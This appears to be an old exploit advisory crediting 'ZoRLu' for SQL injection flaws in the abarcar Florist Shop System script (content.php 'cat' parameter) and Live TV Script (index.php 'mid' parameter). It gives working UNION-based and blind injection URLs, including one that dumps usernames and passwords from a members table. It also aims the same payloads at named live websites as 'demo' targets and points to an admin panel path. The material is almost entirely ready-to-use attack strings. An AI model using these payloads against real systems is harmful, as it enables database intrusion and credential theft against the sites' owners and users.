abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj

abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj

link: http://packetstormsecurity.org/0812-exploits/abarcarflorist-sql.txt

link: http://www.experl.com/abarcar-florist-shop-system-script-contentphp-cat-blind-remote-sql-inj-352/

Discovered By: ZoRLu

Exploit: ( remote )

http://localhost/script_path/content.php?cat=[SQL]

[SQL]=

-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--


exploit for demo: ( you must look title )

http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--


Exploit: ( blind )

http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )

http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )


exploit for demo:

https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )

https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )

Live TV Script (index.php mid) SQL Injection Vulnerability

Live TV Script (index.php mid) SQL Injection Vulnerability

Discovered By: ZoRLu

orjinal bug:

http://www.milw0rm.com/exploits/6404


Exploit :

http://localhost/script_path/index.php?mid=32+union+select+0,concat(username,0x3a,password),2,3+from+members--

Demo:

http://indiaportal.org/demo/index.php?mid=32+union+select+0,concat(username,0x3a,password),2,3+from+members--

Admin Panel:

http://localhost/script_path/siteadmin/